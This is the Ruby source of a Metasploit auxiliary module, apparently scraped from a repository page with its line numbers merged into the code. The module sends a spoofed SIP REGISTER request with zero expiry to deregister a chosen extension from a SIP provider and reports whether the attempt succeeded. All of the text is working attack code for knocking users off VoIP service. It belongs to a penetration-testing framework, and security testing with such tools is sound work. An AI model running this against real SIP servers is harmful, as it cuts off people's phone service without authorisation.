Path: blob/master/modules/auxiliary/voip/sip_deregister.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Scanner89def initialize10super(11'Name' => 'SIP Deregister Extension',12'Description' => %q{13This module will attempt to deregister a SIP user from the provider. It14has been tested successfully when the sip provider/server doesn't use REGISTER15authentication.16},17'Author' => [ 'ChrisJohnRiley' ],18'License' => MSF_LICENSE,19'Notes' => {20'Stability' => [SERVICE_RESOURCE_LOSS],21'SideEffects' => [IOC_IN_LOGS],22'Reliability' => []23}24)2526deregister_udp_options27register_options(28[29Opt::RPORT(5060),30OptString.new('SRCADDR', [true, 'The sip address the spoofed deregister request is coming from', '192.168.1.1']),31OptString.new('EXTENSION', [true, 'The specific extension or name to target', '100']),32OptString.new('DOMAIN', [true, 'Use a specific SIP domain', 'example.com'])33]34)35register_advanced_options(36[37OptAddress.new('SIP_PROXY_NAME', [false, 'Use a specific SIP proxy', nil]),38OptPort.new('SIP_PROXY_PORT', [false, 'SIP Proxy port to use', 5060])39]40)41end4243def setup44# throw argument error if extension or domain contain spaces45if datastore['EXTENSION'].match(/\s/)46raise ArgumentError, 'EXTENSION cannot contain spaces'47elsif datastore['DOMAIN'].match(/\s/)48raise ArgumentError, 'DOMAIN cannot contain spaces'49end50end5152def run_host(ip)53src = datastore['SRCADDR']54ext = datastore['EXTENSION']55dom = datastore['DOMAIN']56sphost = datastore['SIP_PROXY_NAME']57spport = datastore['SIP_PROXY_PORT'] || 506058conn_string = "#{ext}@#{dom}"5960# set Route header if SIP_PROXY is set61if !sphost.nil? && !sphost.empty?62route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"63end6465connect_udp6667print_status("Sending deregistration packet to: #{conn_string}")68print_status("Using SIP proxy #{sphost}:#{spport}") if route6970req = "REGISTER sip:#{dom} SIP/2.0" + "\r\n"71req << route if route72req << "Via: SIP/2.0/UDP #{src}" + "\r\n"73req << 'Max-Forwards: 70' + "\r\n"74req << "To: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"75req << "From: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"76req << "Call-ID: #{rand(100..199)}#{ip}" + "\r\n"77req << 'CSeq: 1 REGISTER' + "\r\n"78req << 'Contact: *' + "\r\n"79req << 'Expires: 0' + "\r\n"80req << 'Content-Length: 0' + "\r\n\r\n"8182udp_sock.put(req)83response = false8485while ((r = udp_sock.recvfrom(65535, 3))) && r[1]86response = parse_reply(r)87end8889# print error information if no response has been received90# may be expected if spoofing the SRCADDR91print_error('No response received from remote host') if !response92rescue Errno::EACCES => e93vprint_error(e.message)94ensure95disconnect_udp96end9798def parse_reply(pkt)99# parse response to check if the ext was successfully de-registered100101if (pkt[1] =~ /^::ffff:/)102pkt[1] = pkt[1].sub(/^::ffff:/, '')103end104105resp = pkt[0].split(/\s+/)[1]106_rhost = pkt[1]107_rport = pkt[2]108109if (pkt[0] =~ /^To:\s*(.*)$/i)110testn = ::Regexp.last_match(1).strip.to_s.split(';')[0]111end112113case resp.to_i114when 401115print_error("Unable to de-register #{testn} [401 Unauthorised]")116when 403117print_error("Unable to de-register #{testn} [403 Forbidden]")118when 200119print_good("#{testn} de-registered [200 OK]")120else121print_error("#{testn} : Undefined error code #{resp.to_i}")122end123124return true # set response to true125end126end127128129